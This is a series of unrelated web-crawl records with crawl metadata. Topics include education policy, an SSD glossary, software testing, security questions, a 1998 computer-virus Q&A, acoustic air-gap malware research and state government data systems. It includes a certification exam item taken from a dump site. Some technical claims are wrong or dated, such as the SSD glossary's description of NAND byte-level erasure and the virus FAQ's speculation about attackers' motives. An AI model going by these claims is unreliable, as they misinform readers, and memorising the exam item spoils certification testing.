Government leaders, teachers, parents, and businesses need to embrace the values of accountability and competition in our schools if we are ever going to improve the current situation." Cisco supports a strong educational agenda and aggressive use of e-learning tools. (Also, see information on Cisco's Networking Academy Program, the world's largest e-learning tool in practice.) Today's low educational standards and poor performance in the United States relative to other industrialized nations are alarming wake-up calls that the K-12 education system is broken and must be fixed. Fundamental educational reform is essential to preserve the health of the US economy. A quality public education system is the cornerstone of a sound society and a dynamic economy. The strength of an economy depends on an educated workforce: workers with basic skills who can think critically and find creative approaches to solving problems. Those skills are important to sustaining our nation's continued growth. Cisco supports TechNet's education reform principles, including: high standards and meaningful accountability; increased competition among public schools, through support for charter schools and other innovative approaches; a strengthened emphasis on excellence in math and science education; expanded access to technology and effective integration of technology in schools; outcomes-focused research and development; improved teacher training, recruitment, and retention; and an increased yield of technically trained college and university graduates. Cisco believes educational skills worldwide can be fundamentally improved through use of technology. In fact, Cisco itself increasingly trains employees in a virtual, rather than physical, classroom setting.
More information on Cisco and Education:
Cisco and E-Learning - Cisco Global Learning Network
Cisco E-learning Innovation and Technology News
The "No Child Left Behind" US Department of Education Page
WEF's Global Competitiveness Report
For information on e-learning, visit Skillsoft
<urn:uuid:b2732a69-7f10-46ba-a46a-9619523b2518>
CC-MAIN-2017-04
http://www.cisco.com/c/en/us/about/government-affairs/high-tech-policy-guide/investing-knowledge/e-learning.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00193-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941011
1,007
3.53125
4
Solid-state drives (SSDs) operate on a completely different technological principle than mechanical hard disk drives (HDDs), so naturally there is different terminology to describe SSD technology. Instead of talking about data buffers, cylinders, and sectors, SSD technology is described in terms of flash storage and IOPS. So you need to be prepared to use the right terminology to educate customers about the superior performance of SSD technology. Where an HDD provides non-volatile data storage using a spinning magnetic platter that is read by a mechanical arm, SSDs store data in interconnected flash memory chips. Both types of data storage will preserve data when there is no power, but SSDs offer a number of advantages in terms of speed, reliability, and longevity. For enterprise applications, SSD technology is edging out the old mechanical HDDs as the price-performance becomes comparable. So if you are considering adding SSD technology to your product catalog, here are some of the terms that you need to use to educate your customers: Flash controller – The controller is the part of flash memory that handles communication between the host device and the flash file directory. The flash controller manages wear leveling, error correction, and garbage collection. Hybrid hard disk drive – The hybrid HDD combines a mechanical HDD with SSD technology, using a NAND flash chip that serves as a non-volatile data cache for faster operation. IOPS – Unlike HDDs, which measure data transfer speeds in megabits per second, SSD technology uses input/output operations per second, or IOPS, to measure the maximum number of reads/writes. Multi-level cell (MLC) – MLC is flash memory that can store more than one bit of data per cell. It is less expensive than single-level cell (SLC) and is often used in consumer devices. SLC is considered more reliable and faster, although it is more expensive. Experts say that SLC has 10 to 20 times the endurance of MLC, and has a typical lifespan of 100,000 write cycles vs. 30,000 for MLC memory. NAND – NAND stands for Negated AND or Not AND and is a logic gate in SSD technology that can be written or read in blocks, so individual bytes of data can be written and erased independently. RRAM – Resistive random access memory or RRAM is a type of nonvolatile data storage that stores data by changing the resistance of a polarized material using a memristor or memory resistor. RRAM offers higher switching speeds for SSD technology. Solid-state storage program erase cycle – Also called the PE cycle, this is the process of writing to NAND flash memory, erasing the memory, then rewriting. Flash memory can only accommodate a limited number of PE cycles since each cycle causes some physical damage to the flash media. SSD overprovisioning – As it sounds, SSD overprovisioning is adding more storage capacity than is visible to the host as available storage. This added capacity increases the durability of SSDs by distributing the total number of data writes and erases across a larger group of NAND-based memory blocks. PCIe storage – This is a PCI Express extension card installed directly in the server. Using a direct connection delivers faster performance than SATA, SAS, or Fibre Channel drives and is well-suited for I/O-intensive data processing, such as transaction processing or data warehouses. Tier 0 – This is a level of storage that is faster than others in the storage hierarchy.
The lower the tier number is in a tiered storage hierarchy the faster the response time for data retrieval (and the more expensive the hardware). This is part of a trend to move active data faster, rather than moving less active data to slower, less expensive platforms. TRIM – TRIM is a command that tells NAND SSDs when specific blocks of data are no longer in use and therefore can be overwritten. TRIM enables the SSD technology to handle garbage collection to improve overall SSD performance. Wear Leveling – To prolong the serviceable life of SSD technology, wear leveling distributes the read/write cycles among all the data blocks in a storage microchip. Since flash memory can only handle a finite number of read/writes (typically 100,000 PE cycles for SLC NAND flash), wear leveling ensures that wear is even, therefore extending the life of the SSD. These are just some of the common terms you will encounter when discussing the pros, cons, and performance of SSD technology. Educating customers about the greater value of SSD technology may require you to compare SSDs and HDDs, which is somewhat of an apples and oranges comparison. Being able to map the differences between the two data storage platforms using the right terminology will help you clarify the benefits inherent in SSD technology.
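To make the IOPS figure concrete, here is a small illustrative calculation in Python; the numbers used (50,000 random-read IOPS at a 4 KiB block size) are assumed example values, not a claim about any particular drive:
# Rough conversion from an IOPS rating to equivalent throughput.
# Both figures below are assumptions chosen only for illustration.
iops = 50_000                 # small random read operations per second
block_size_bytes = 4 * 1024   # 4 KiB per operation
throughput_mb_s = iops * block_size_bytes / 1_000_000
print(f"{iops} IOPS at 4 KiB per I/O is roughly {throughput_mb_s:.0f} MB/s")
# prints: 50000 IOPS at 4 KiB per I/O is roughly 205 MB/s
The point of quoting IOPS is that it captures how many small, scattered requests a drive can service, which is where SSDs outperform mechanical HDDs most dramatically; sequential throughput figures alone can make the two technologies look closer than they really are.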
<urn:uuid:23e71ac2-5ef5-4893-bafc-dc888ac6f2d5>
CC-MAIN-2017-04
http://www.ingrammicroadvisor.com/components/12-terms-vars-should-teach-customers-about-ssd-technology
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00551-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910022
978
3.734375
4
Testing software quality is an essential part of the development process that includes work before and after the software’s release. Software quality testing is like a more robust form of software debugging—where the development team is concerned with how well the program works as opposed to whether it works. The process not only examines end user experiences with the released product, but also takes into consideration programming quality concerning the ease-of-use for the development team. Standards and expectations can vary widely between software projects, so the components of the software quality analysis and implementation process are different for each project based on the implementation and construction of the finished product. Human and Automated Elements While human programmers are a required part of the software quality testing process, there are automated testing tools that can take on a large share of the work. Utilizing these tools can give your programming team a substantial amount of data to work with to identify, isolate, and resolve issues with the software. Apica offers both on-demand and continuous delivery load testing solutions to test and optimize software performance throughout delivery life cycles. While performance testing is only one small part of any software testing program, it is an important one. Define Your Components An organization can’t just assign programmers to review the software source code without a structured process plan and expect quality results. The developers in charge of the quality test need to answer what specific elements of the software need to be gauged, and what metrics they are going to use to measure those elements. The process should look at the user experience, as well as development aspects like scalability and maintenance. Some example qualitative metrics include ease-of-use, testability, portability, stability, and robustness. Like a reconnaissance mission, it’s best to do an informal walkthrough of the code with the development team to familiarize all members with the different parts of the larger project they may not individually work on. Test the project as both a developer and an end user. This is where proper documentation standards come into play: The notes can make it much easier for developers to understand unfamiliar code. If the team finds that documentation is lacking, they would rate a “documentation” metric “poor.” After the walkthrough, it helps to carry out a code inspection to analyze which parts of the software could benefit from improvements. For example, check to see if functions and variables are using a consistent naming pattern, and if the white space is being used to make the code legible. This is also a good time to test the software on older versions of plug-ins, externally-hosted libraries, operating systems, and web browsers (when applicable) to ensure compatibility with older versions. If you find that you can change a few lines of code to make sure the software works with an older version your end users might reasonably use, it’s worth your while to make the change. During this process, it also helps to examine the program for quantitative metrics like program speed, network bandwidth consumption, and memory use. Addressing issues with the previously mentioned criteria leads to a much more stable and usable program. Automated tools can handle a substantial part of the work at this point, taking on tasks like identifying parts of the code that hit or even create performance bottlenecks. 
After you’ve established what needs to be improved and addressed in the software, it’s time for the development team to get busy. Mental fatigue can be a productivity killer during the implementation process, so developers can try reviewing code in 60- to 90-minute intervals, looking at about 200 lines of code at a time with at least 20 minutes of break time in between. When you’ve identified code that can be improved and implemented changes, you need to verify that it works by actually running through the code to make sure developers fixed existing problems and didn’t create new ones. Additionally, it helps to have team members other than the ones that programmed the code verify the code: It does the double duty of familiarizing the rest of the team with the code.
<urn:uuid:5f6387b2-484c-4f58-820c-06d19974081f>
CC-MAIN-2017-04
https://www.apicasystem.com/blog/components-testing-software-quality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00513-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934385
839
2.609375
3
Forgot the fake answer you made up to that online security question? Turns out you’ve got plenty of company. A new study by Google looked at millions of users and found that 40 percent could not remember the answer to a security question when they needed it. It’s not only memorability that’s a problem. Security questions aren’t really all that secure. According to the study, “Statistical attacks against secret questions are a real risk because there are commons answers shared among many users. For example using a single guess an attacker would have a 19.7% success rate at guessing English-speaking users’ answers for the question ‘Favorite food?’" About 16 percent of the answers to common security questions are accessible online, such as through social networking sites. “Even if users keep data private on social networks, inference attacks enable approximating sensitive information from a user’s friends,” said the study. Public records provide common answers too; for example birth and marriage records are a source of mothers’ maiden names for at least 30 percent of Texas residents. Researchers found that “it appears next to impossible to find secret questions that are both secure and memorable.” While the study concludes that security questions still can be useful, researchers suggest they be used with other methods, such as SMS or e-mail based recovery procedures. This story, "The trouble with those online security questions you like to use" was originally published by Fritterati.
<urn:uuid:55fa1a40-b6f7-4b41-84f3-86b8d707a143>
CC-MAIN-2017-04
http://www.itnews.com/article/2925834/the-trouble-with-those-online-security-questions-you-like-to-use.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00421-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944456
318
2.625
3
William F. Slater, III
VIRUS QUESTIONS AND ANSWERS with Valuable Text Resources
1. What is a computer virus? A computer virus is an intelligent, usually destructive computer program which has the peculiar ability to surreptitiously penetrate a computer system and replicate itself by attaching itself to other programs, while causing problems ranging from irritating system behavior, to destruction of physical system components, to massive software and/or data destruction.
2. Besides viruses, what other types of destructive programs are there?
Trojan Horses -- Like its namesake, this type of program enters a system in an innocent manner and waits for the right moment to unleash its attack.
Worms -- A self-replicating program which exists independently of other programs.
Logic bombs -- A destructive program which is triggered by a date, time, or event, and when triggered, it destroys data and/or other programs.
Salamis -- A special program which invades a financial program and removes assets a "slice at a time", hence the name.
Trap Doors -- These are facilities which permit a hacker to surreptitiously enter a system by means of a security loophole which is either inherent in the operating system, or possibly one which the hacker creates while he is a user on the system.
Session Hacking -- A special type of hacking which requires hardware, software, and communications expertise. It involves the penetration of a system via network lines and/or possibly through the detection of electronic emissions which radiate from active monitors and terminals.
3. How are viruses transmitted? Viruses are transmitted via magnetic and/or electronic mediums because of careless and/or ignorant computing activities. And in some rare cases, viruses may even be spread via wireless networks and/or EPROM (firmware) chips.
4. How has the influence of the online world (the Internet, networks, bulletin board systems, and e-mail) affected the world of viruses? Since November 1988, when the Internet Worm created by Robert T. Morris, Jr. wreaked over $100 million worth of problems on computers connected to the Internet, it has been obvious that having computers connected on a computer network increases the possibility of virus infections. That is not to say that networks are bad; in fact, networks are becoming more and more essential and valuable all the time. It's just that being online on a network, a BBS, or dialed into a remote computer increases the possibility of contact with viruses.
5. Will you get in trouble if you report a virus? No. It is expected that all computer users will recognize the seriousness of a virus attack and call your company's Help Desk or an experienced person immediately.
6. What can viruses and other destructive software do to your system? Best case, a virus may turn out to be a nuisance, such as playing a song repeatedly at random times.
In the worst case, a virus can rapidly spread through a system or a group of systems on a computer network, rapidly destroying programs and data. The biggest problems with viruses is that they can spread and do their work silently, quickly, and efficiently, before you ever discover that they are there. 7. How many viruses are there? At last count, there are over 11,000 viruses, and the list grows at about at least 50 new viruses per month. As you would guess this certainly is enough to keep the anti-virus software producers in business. 8. How do you prevent viruses? Prevention of virus attacks requires a conscious effort in the area of "safe-computing". Safe computing means 1) be careful about the data and programs you put into your system. 2) don't ever operate bootleg (illegal copies) of software on your system 3) you don't leave disks lying in the open where someone may place a virus on it without your knowledge 4) use a virus attack prevention program, such as McAfee's VSHIELD or Symantec Norton Anti-Virus 9. How do you know if you have a virus? Systems which are affected with viruses act erratically. Sometimes the virus will identify itself with a message giving its name on the screen of your computer monitor. In extreme cases, enough data and/or programs may have been destroyed to prevent your computer from successfully booting. Does your PC have any of the following symptoms? 10. How do you stop a virus once you discover you have one? Call the Help Desk or a qualified technical person immediately. Since viruses can constitute a serious threat to a data intensive organization such as a law firm, it is absolutely imperative that virus outbreaks are quickly isolated, identified, and treated so it prevents their continued spread. Your contacting the Help Desk to get experienced people dispatched on the problem is the best way to check a virus attack. 11. Why do people write viruses and other destructive software? Certain people get a thrill from using their intimate technical knowledge of software, computers, and human behavior, to write destructive software which wreaks havoc in the workplace. Another chief reason that viruses are written is to seek revenge against Americans for being ahead in computer technology and in the business environment. Since it is now illegal to write software which destroys other software and data, the people who write viruses are not only doing it to get a thrill, they are also breaking the law and they risk severe criminal and civil penalties if they are caught. An interesting quote from The Computer Virus Protection Handbook by Colin Hayes, pp 28 - 29, 1990, SYBEX, gives further insight about the types of people who write computer viruses: "Viruses have provided a weapon for those members of society who wish to harm others for a variety of reasons. Some of these people are mischievous or destructive vandals, others have political points to make, and still others want to sabotage governments, organizations, or companies that they feel have done them wrong. "Because the computing population has become so big, there now exists a significant number of vandals, sick minds, and people alienated from the mainstream who have the necessary skills to express their feelings by spreading viruses. "There is the copycat phenomenon to consider as well -- for example, one case of someone putting poison into a proprietary medicine can lead to others imitating that action. 
Unlike drug tampering, however, you cannot stop the spread of copycat virus activity by putting tamperproof seals on software packaging. Also, virus creation grows by going beyond simple copycat activity to inspiring someone to create a better virus... "Particularly intriguing is the possibility of virus creation being a new manifestation of the antagonism felt by some hackers against the way computers are being used by big business, government agencies, and other establishment symbols. Computing is a passion that dominates the lives of many enthusiasts. For some, that passion can develop into obsessional behavior, creating irrational motives to wreak revenge against those perceived to be abusing the "purity" of computing concepts. "Jealousy and a sense of inferiority can also play a role in shaping a hacker's attitudes. A maverick hacker who has difficulty relating to people and the real physical world feels that he must protect the computing environment, in which he functions comfortably, from being controlled by the very individuals and groups he resents. By disrupting systems and destroying data, he demonstrates that he is in control and has tangible power in territory that he regards as his personal space." 12. What are some good reference books on computer viruses and other destructive software? There are several which have been published since 1988. Listed below are several very good texts: Computer Virus Information Text Resources Maximum Security: A Hacker's Guide to Protecting Your Internet Site and Network ISBN 1-57521-268-4, 886 pages, $49.99 1997, Sams Publishing The Underground Guide to Computer Security By Michael Alexander ISBN 0-201-48918-X, 240 pages, $19.95 1996, Addison-Wesley Publishing Co. Robert Slade's Guide to Computer Viruses ISBN 0-387-94663-2, 422 pages, $34.95 Computer Crime: A Crimefighter's Handbook By David Icove, Karl Seger, and William VonStorch ISBN 1-56592-086-4, 440 pages, $24.95 1995, O'Reilly & Associates Complete LAN Security and Control By Peter T. Davis ISBN 0-8306-4548-9, 330 pages, $34.95 1994, Windcrest / McGraw-Hill Computer Viruses, Artificial Life and Evolution By Mark Ludwig ISBN 0-929408-07-1, 374 pages, $22.95 1993, American Eagle Publications (Tucson, AZ) The Little Back Book of Computer Viruses -- Vol. One: The Basic Technology By Mark Ludwig ISBN 0-929408-02-0, 182 pages, $14.95 1991, American Eagle Publications (Tucson, AZ) The Computer Virus Protection Handbook By Colin Hayes ISBN 0-89588-696-0, 192 pages, $24.95 VIRUS! The Secret World of Computer Invaders That Breed and Destroy By Alan Lundell ISBN 0-8092-4437-3, 190 pages. $9.95. 1990, Contemporary Books (Chicago and New York) Computers Under Attack: Intruders, Worms and Viruses Edited by Peter J. Denning ISBN 0-201-53067-8, 566 pages, $24.95 1990, ACM Press, Div. of Addison-Wesley Rogue Programs: Viruses, Worms, and Trojan Horses Edited by Lance J. Hoffman ISBN 0-442-00454-0, 384 pages, $24.95 1990, Van Nostrand Reinhold (New York) Computer Viruses, Worms, Data Diddlers, Killer Programs and Other Threats to Your System By John McAfee and Colin Hayes ISBN 0-312-02889-X, 236 pages, $16.95 1989, St. Martin's Press V.I.R.U.S. Protection: Vital Information Resources Under Siege By Pamela Kane ISBN 0-553-34799-3, 478 pages, $39.95. 1989, Bantam Books Special Section on the Internet Worm Communications of the ACM - June 1989 "The Worm Story" Issue "The Internet Worm: Crisis and Aftermath" by Eugene H. Spafford "With Microscope and Tweezers: The Worm from MIT's Perspective" by Jon A. 
Rochlis and Mark W. Eichin "Password Cracking: A Game of Wits" by Donn Seeley "The Cornell Commission: On Morris and the Worm" by Ted Eisenburg, David Gries, Juris Hartmanis, Don Holcomb, M. Stuart Lynn, Thomas Santoro Compute!'s Computer Viruses By Ralph Roberts ISBN 0-87455-178-1, 170 pages, $14.95 1988, Computer! Books Publications (Greensboro, NC) Computer Viruses: A High-tech Disease By Ralf Berger ISBN 1-55755-043-3, 276 pages, $18.95 Computer Virus Developments Quarterly: The Independent Journal of Computer Viruses Published quarterly by American Eagle Publications, Inc. P.O. Box 41401 Tucson, AZ 85717 Price $75 per year. Byline: William F. Slater, III is a computer consultant who has been working in theComputer Industry since 1977. He also teaches and writes, and loves this stuff so much that he has a seven-computer network in his home. The names of his computers are Jim, Mitchell, Andreas, Elvis, Peter, Carey, and Bill. To learn more about Mr. Slater and to sample his free class materials, visit him on the web at http://billslater.com or e-mail him at email@example.com. Last Updated: May 10, 1998 By Bill Slater, Webmaster
<urn:uuid:0e61db29-ffe5-4b2c-929a-71b4a9b40758>
CC-MAIN-2017-04
http://www.billslater.com/ws_virus.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00449-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907646
2,671
3.109375
3
The Hopkins, MN School District is turning fun and games into learning and responsibility. Benjamin Friesen and John Wetter of the Hopkins district discussed how their badge program encourages students to demonstrate iPad and digital proficiency. To create a culture of learning and sharing, Hopkins implemented a fun badge program where students earn badges by passing 10-question exams that demonstrate their knowledge of their iPads. The badges include a color scheme, similar to a karate system, where white is the first belt and then as exams get progressively harder, they can build all the way to black — where students are certified as Ninjas. Benjamin said, “the kids are motivated by this, they want to play.” This has caught on so well, that Hopkins has rolled out a few more badges, including: Footprint — This badge ensures students understand digital responsibility, ethics, and how to navigate an increasingly digital world. Online — This badge ensures students know how to interact professionally with their teachers and can backup important documents to the cloud. Scholar — This badge ensures that students understand what academic honesty means and why it is important in school. The badge program has been wildly successful and in the 2013-14 school year, Hopkins rewarded 2,440 badges to students who earned them. Hopkins is taking this to the next level by creating a ‘Genius Team’ of students that can help other students and teachers with IT questions. Ben sees these students as “the first line of defense.” As an added bonus, those in attendance had an opportunity to earn a white badge by answering a few elementary questions about the iPad. We won’t tell you how many passed! Watch the full video of this session now.
<urn:uuid:22c6df41-ef2e-4f46-af27-3487664d30bf>
CC-MAIN-2017-04
https://www.jamf.com/blog/hopkins-schools-ipad-dojo-where-students-become-ipad-ninjas/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00357-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963033
354
2.96875
3
What are the two most likely driving forces motivating businesses to integrate voice and data into converged networks? (Choose two.)
- Voice networks cannot carry data unless the PRI circuits aggregate the BRI circuits.
- Their PSTNs cannot deploy features quickly enough.
- Data, voice, and video cannot converge on their current PSTN structures.
- Voice has become the primary traffic on networks.
- WAN costs can be reduced by migrating to converged networks.
VoIP provides transport of voice over the IP protocol family. IP makes voice globally available regardless of the data-link protocol in use (Ethernet, ATM, Frame Relay). With VoIP, enterprises do not have to build separate voice and data networks. Integrating voice and data into a single converged network eliminates duplicate infrastructure, management, and costs. Figure 14-7 shows a company that has separate voice and data networks. Phones connect to local PBXs, and the PBXs are connected using TDM trunks. Off-net calls are routed to the PSTN. The data network uses LAN switches connected to WAN routers. The WAN for data uses Frame Relay. Separate operations and management systems are required for these networks. Each system has its corresponding monthly WAN charges and personnel, resulting in additional costs, as illustrated in Figure 14-7 (Separate Voice and Data Networks).
Cisco Press CCDA 640-864 Official Certification Guide, Fourth Edition, Chapter 14
<urn:uuid:99c0e128-f407-49d8-91e7-da7a5ffbaa7d>
CC-MAIN-2017-04
http://www.aiotestking.com/cisco/what-are-the-two-most-likely-driving-forces-motivating-businesses-to-integrate-voice-and-data-into-converged-networks/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00176-ip-10-171-10-70.ec2.internal.warc.gz
en
0.901155
301
2.84375
3
Physically isolating critical systems from networks and systems that are unsecured has long been used as a simple way to protect the former from unwanted intrusions and malware. But, with the advent of Stuxnet, the “air gap” measure has proven to be inadequate when motivated attackers are involved. Quite recently, security researcher Dragos Ruiu has unnerved and intrigued the security community with claims that he has been analyzing a piece of malware that “jumps” from one computer to another in its proximity, without the two being connected in any way to each other, to a network, or the Internet. He posited – but hasn’t yet conclusively proven – that this “badBIOS” reaches across air gaps by taking advantage of computers’ speakers and microphones, and the high-frequency transmissions that can be passed between them. A few weeks later, a new issue of the Journal of Communications was released, and in it was a paper written by two German researchers who have managed to create a malware prototype that uses a “covert channel of communication”, i.e. the very speakers and microphones that Ruiu believes are crucial to badBIOS’ dissemination. They tick the four boxes that the researchers consider crucial to “covert” communication: they are usable as either a sending or a receiving device, are accessible to the sending or receiving process, are not yet established as a communication device (i.e. not subject to the system and network policies), and are able to support stealthy communication (and thus prevent immediate detection). “With a covert acoustical mesh network, we can offer a whole range of covert services to the participating computing systems, including internet access via an IP proxy,” they explained. “In the considered scenario, we are able to show that even high-assurance computing systems can be exploited to participate in a covert acoustical mesh network and secretly leak critical data to the outside world.” They did so by implementing an adaptation of an emulation system for underwater acoustical networks from the Research Department for Underwater Acoustics and Marine Geophysics in Germany, by using two laptops, and a series of devices they “chained” together to transport the signal over a greater distance. The only problem is that this channel has a very limited transmission rate, which makes it only good for relaying small-sized files – containing, for example, keystroke data or similar sensitive information – to the attacker’s computer nearby or via a local proxy server to a remote email server located anywhere in the world. The researchers – Michael Hanspach and Michael Goetz of the Fraunhofer Institute for Communication, Information Processing, and Ergonomics – have also come up with countermeasures against this type of information leak, but to know more about it all (and in greater detail), I advise reading their paper.
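To put that “very limited transmission rate” into perspective, here is a back-of-the-envelope estimate; the roughly 20 bit/s channel rate is the figure reportedly achieved by the researchers' prototype, and the 1 KB keystroke log is an assumed example payload:
# Rough exfiltration-time estimate for a low-rate acoustic covert channel.
channel_rate_bps = 20    # approximate rate reported for the prototype, in bits per second
payload_bytes = 1024     # assumed size of a small keystroke log
seconds = payload_bytes * 8 / channel_rate_bps
print(f"Sending {payload_bytes} bytes at {channel_rate_bps} bit/s takes about {seconds / 60:.0f} minutes")
# prints: Sending 1024 bytes at 20 bit/s takes about 7 minutes
Slow as that is, it is more than enough to leak passwords or cryptographic keys from a machine that is supposed to be unreachable, which is exactly the scenario the paper describes.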
<urn:uuid:17cbd7f5-9550-4ee6-b591-b96db22fea18>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2013/12/03/researchers-prove-malware-can-communicate-via-computer-speakers-and-microphones/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952343
609
3.015625
3
One of the education world's newest trends is using technology to help schools function with the sort of efficiencies normally found in the business world. Enterprise Resource Planning (ERP) packages were among the first tools to move from the business world to the education world. ERP systems, with their combination of financial, human-resources and procurement functions, are now being used by many educational institutions to streamline complex administrative functions. Schools are also looking to technology as a means of measuring accountability. The Ohio Department of Education (ODE) is one of the pioneers in this area. In 1998, the Ohio Legislature enacted SB 55 to improve school accountability. Specifically, SB 55 required the ODE to generate "report cards" measuring district and building-level performance in 18 different areas for all 611 school districts in the state. In doing so, the department and state lawmakers hoped to more easily compare and contrast schools with state performance standards and to identify which institutions were excelling and which were falling behind. The assignment was a difficult one, admitted the department's chief information officer, Rob Luikart. "The report cards required us to collect data from schools and from proficiency-testing companies. But even after all the data was collected, giving it meaning within the confines of a paper report was not easy. You could see the data, but making sense of it and giving it real value was going to require a lot more." When Luikart began working for the department earlier in 1998, the organization stressed to him its goal of developing a technology plan and data architecture. Luikart, therefore, decided that a technical approach to the report-card dilemma might be the perfect solution. "Like many Fortune 500 companies, much of our financial and management information was locked up in legacy systems that didn't talk to one another," he said. "We needed to take a more enterprise view of that information, so we undertook a project to build a data warehouse. That was sort of a watershed event for the agency." The first function of the new data warehouse was to compile the ODE's school-report-card information. Not only would the system efficiently compile all the components from the districts, it would also allow the department to build an interactive version of the report card to be placed on the Internet. "We wanted to create an e-government environment, meaning we could make this information -- which is important to constituents, the public, legislators, school boards, administrators, parents, teachers and sometimes even kids -- easily accessible to all of them. We also wanted to add value to it," Luikart said. Putting it in Place Once the department decided what it wanted, it went looking for strategic partners and best-of-breed practices in warehouse design and implementation. The ODE utilized the expertise of several consulting groups, chose partners and began building the system. Today, the department's report cards are compiled electronically and available to anyone at its Web site . There, visitors can view a report card from any Ohio school, examine proficiency-test information, attendance and enrollment data, student achievement statistics, teacher qualifications, graduation rates or annual spending per pupil. They can also instruct the system to compile sophisticated reports. "It allows people to look at trend information. 
It reveals trends on a given district's three-year performance and shows how well it performed in comparison to similar districts and the overall state average," said Luikart. "It provides data that wouldn't be easy to display on the paper report card because it would take up too much space. Things you can't do with paper can be done easily on the Web, using decision-support software and other tools." According to Luikart, access to student data at the individual school level allows everyone involved in education to make better decisions for Ohio's students. From the legislative point of view, the department's Web site will improve accountability by showing the state what it's getting -- or not getting -- for its investment. "We'll be able to see what methods of teaching and curriculum are most effective, if programs are having an impact, etc. That's data that wouldn't be easily understood, or even available, prior to the report cards." Meanwhile, school administrators will use the system to formulate long-term strategies and spot downward trends before they become serious problems. If one school in the state performs excellently, other schools can easily emulate the methods. Parents can use the system to choose the best school for their children. If a school is performing poorly, communities can organize to make changes. "Few factors have greater impact on student performance than parent and community involvement," said Luikart. "For this reason, providing information to parents and community members in an interactive environment is important. We want them to understand what questions to ask of teachers, administrators and students; to look for areas of strength and weakness and to understand them so they can make informed decisions. Ohio is a local-control state, so there is a great emphasis on local decision-making. Having the information on the Web gives people a basis on which to ask those kinds of questions." Rob Silverman of MicroStrategy Inc., one of the ODE's partners, said the ODE is one of the few organizations to realize that providing interactive information over the Web can help build a bond with constituents and deliver better service. "This is an organization that's using technology in a way that really adds value to the public," Silverman said. "It is one of the pioneers in doing so." With their interactive report cards in place, the department is already looking to take the data warehouse to the next level. Plans include making financial and program information available electronically. "It will be interesting to see how providing this kind of information and this kind of tool unfolds and how it might influence activities in the future," said Luikart. "This is just the beginning of a trend in government and education of moving information into a forum where the public can actually use it." Justine Kavanaugh-Brown is editor in chief of California Computer News, a Government Technology sister publication. E-mail
<urn:uuid:da206fca-ddf8-45f3-b408-233d50621bc4>
CC-MAIN-2017-04
http://www.govtech.com/magazines/gt/An-ODE-to-Accountability.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282937.55/warc/CC-MAIN-20170116095122-00202-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962813
1,247
2.71875
3
Mosquitoes are among nature's least loved winged insects. But, when they went from being mere pests to carriers of the West Nile Virus, they became a serious health threat. Today, the Commonwealth of Pennsylvania is putting its experience with battling virus-carrying mosquitoes to good use in fighting an even greater threat to the nation's health - biological and chemical terrorism. When the West Nile Virus, carried by mosquitoes, threatened to migrate from New York to Pennsylvania several years ago, the commonwealth responded by creating a GIS-based system that plots and tracks the location where virus-infected animals have been found. The events of 9-11 spawned the Pennsylvania Incident Response System (PAIRS), an application modeled after the West Nile Virus system that is designed to track bio-terrorism threats, assess potential incidents and analyze suspected biological agents. GIS forms the cross-agency platform that is key to the effectiveness of both the West Nile Virus Tracking system and PAIRS, according to Eric Conrad, a 25-year veteran of state service. Conrad, deputy secretary for field operations at Pennsylvania's Department of Environmental Protection (DEP), is a long-time champion of GIS mapping to streamline government processes. In 2001, as the West Nile Virus proliferated, the commonwealth found itself poorly positioned to respond. Conrad, a strong proponent of the "picture is worth a thousand words" theory, was confident that GIS mapping would be an essential tool in meeting the new threat. Starting with no infrastructure, staffing or experience in tracking vector-born diseases, the DEP created a multi-agency system based on shared information and systems. "We kept three cabinet secretaries on message for three years, and the public benefited because everyone was working together," Conrad said. "The message was consistent about what the state was doing to protect them. We even had environmental groups on our side. It suddenly became a role model for good government." The know-how gained from that experience now is being used to strengthen homeland defense. "We are building the incidence response system," he said. "All the technology and pieces that are being rolled into this new system have already been proven." Thanks to some forethought, flexibility had been part of the original model. "What happened was that when we built the tracking system, I said we can't build it just for one disease," Conrad said. "It has to have an open architecture." The core of the West Nile Virus system is a relational database shared by four Pennsylvania agencies - DEP, the Health Department, Department of Agriculture, and the Department of Conservation and Natural Resources. Field agents use handheld computers to gather incident information as they collect samples. That information is then fed into the database. "If you get the people doing the field work putting [information] in the database, you get fewer errors," Conrad said. "We thought about how we could minimize the amount of data entry and that's where the handhelds came in. Our aim was to keep it as simple as possible." Field agents carry HP iPAQ units, but Conrad said any Windows CE-based device could be used. The system, based on ESRI's ArcPad GIS software, immediately captures longitude and latitude for collected samples; it also records the time of collection and offers customizable screens for additional field-collection data. 
When field agents return to the office, their mobile devices are synced to laptops and data is downloaded to the enterprise GIS database using ESRI's ArcSDE software. ArcSDE is the GIS gateway that facilitates managing spatial data within the database management system. The entire process was designed with field staff in mind. "They are more scientists than IT people," Conrad said, adding that simplicity of use was a core requirement for the system. Along with the four partner agencies, three state laboratories, 67 county
<urn:uuid:75a494a3-8450-46fa-bec0-eefc4a84e299>
CC-MAIN-2017-04
http://www.govtech.com/e-government/Bitten-by-the-GIS-Bug.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962388
791
3.03125
3
